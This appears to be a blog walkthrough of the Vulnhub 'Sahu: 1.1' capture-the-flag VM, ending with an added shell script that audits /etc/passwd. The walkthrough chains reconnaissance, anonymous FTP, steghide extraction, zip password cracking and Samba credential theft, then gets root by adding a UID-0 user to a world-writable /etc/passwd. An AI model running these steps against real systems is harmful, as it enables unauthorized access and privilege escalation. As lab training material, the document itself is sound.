sahu: 1.1 Walkthrough Vulnhub

sahu: 1.1 Walkthrough Vulnhub CTF

Sahu: 1.1 is another CTF challenge from Vulnhub. Its difficulty level is set for beginners, and it is a boot-to-root challenge. You can download it here.

According to the author

Sahu is a VirtualBox VM built on Ubuntu 64-bit. The goal of this machine is to get root and read the root.txt file with some good enumeration skills.

Network Scanning

First, we scan our local network with netdiscover:

netdiscover

The next step is scanning the host IP with an Nmap aggressive scan to identify open ports and running services:

nmap -A -p- 192.168.1.35
Enumeration

We found the following open ports on the target: 21 (FTP), 22 (SSH), 80 (HTTP), and 139/445 (SMB, Samba server). The Nmap scan also shows that the FTP port allows anonymous user login.

  • username: ftp
  • password: ftp
ftp 192.168.1.35
ls
get ftp.zip

After logging in over FTP, I found a file named ftp.zip, but it is password protected.


When we open the machine's IP in a web browser, we see a map of Haryana state.

http://192.168.1.35

Downloading the Haryana JPG file:

wget http://192.168.1.34/Haryana-1-1.jpg

Basic directory scanning with dirb:

dirb http://192.168.1.34

dirb did not show anything useful, so I moved on to reading the page source, where I found a line in a paragraph: "try to extract with hurry".

http://192.168.1.35/H/A/R/Y/A/N/A

Extracting the data hidden in the Haryana image file, using the password hurry:

steghide extract -sf Haryana-1-1.jpg

After extraction I found a new file, file.txt, containing a hint from the author: "I have forgotten the last two part of it can you find out 5AHU**"

cat file.txt

I created many dictionaries with crunch, but finally I found the correct wordlist. In the crunch pattern, ^ stands for a symbol and % for a digit:

crunch 6 6 -t 5AHU^% > wordlist.txt

Cracking the zip file with fcrackzip, a Kali Linux tool, in dictionary mode (-D), passing our wordlist with the -p parameter, followed by the ftp.zip file name:

fcrackzip -D -p wordlist.txt ftp.zip

We found a possible password: 5AHU#5

unzip ftp.zip
cat ftp.txt

I logged in to the Samba share with the credentials from ftp.txt and found another file, ssh.txt. The get command downloads the file to our local system.

smbclient //192.168.1.35/sambashare -U sahu

get ssh.txt
cat ssh.txt
  • username: haryana
  • password: hralltime

Log in over SSH:

ssh haryana@192.168.1.35
id
Privilege Escalation

During enumeration I found that the target system's /etc/passwd file is writable by all users, so any user can edit it.

ls -lsa /etc/passwd

Generating a new salted MD5 hash:

openssl passwd -1 -salt rahul hackNos

Adding our user to the /etc/passwd file using the nano editor:

nano /etc/passwd

After adding the new user to the target's /etc/passwd, I ran su (the switch user command) to hacknos, and our shell changed from a normal user to the root user.

su hacknos

Finally, we found our root flag!

cd /root
ls 
cat root.txt
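
The escalation above depends on two conditions: /etc/passwd is writable by every user, and su accepts a password hash stored directly in the file's second field. As an added example (not part of the original walkthrough), the shell check below reports both conditions; audit_passwd, write_sample and the finding labels are hypothetical names, and the sample content is constructed.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# audit_passwd and the finding labels are hypothetical names.

# audit_passwd FILE: print one finding per line for a passwd-format FILE.
audit_passwd() {
    file=$1
    # File mode: write access for "other" or "group" lets unprivileged
    # users append accounts. -prune stops find from descending.
    if [ -n "$(find "$file" -prune -perm -0002 2>/dev/null)" ]; then
        echo "WORLD_WRITABLE $file"
    elif [ -n "$(find "$file" -prune -perm -0020 2>/dev/null)" ]; then
        echo "GROUP_WRITABLE $file"
    fi
    # Entries: name:password:uid:gid:gecos:home:shell
    awk -F: '
        /^#/ || /^[ \t]*$/ { next }
        NF != 7 { print "MALFORMED line " NR; next }
        $3 == 0 && $1 != "root" { print "EXTRA_UID0 " $1 }
        $2 == "" { print "EMPTY_PASSWORD " $1; next }
        # "x" defers to /etc/shadow; "*" or a leading "!" is a locked entry.
        $2 != "x" && $2 != "*" && $2 !~ /^!/ { print "INLINE_HASH " $1 }
    ' "$file"
}

# write_sample FILE: constructed passwd content resembling the end state of
# the walkthrough (the hash value is a placeholder, not a real hash).
write_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
haryana:x:1000:1000::/home/haryana:/bin/bash
hacknos:$1$rahul$PLACEHOLDERHASHPLACEHOLDER:0:0:root:/root:/bin/bash
EOF
}

# Demo on the constructed sample, made world-writable like the target's file.
sample=$(mktemp)
write_sample "$sample"
chmod 666 "$sample"
audit_passwd "$sample"
rm -f "$sample"
```

On a real host, call audit_passwd /etc/passwd; a correctly configured system (mode 644, hashes in /etc/shadow, root as the only UID 0 account) produces no output.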

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
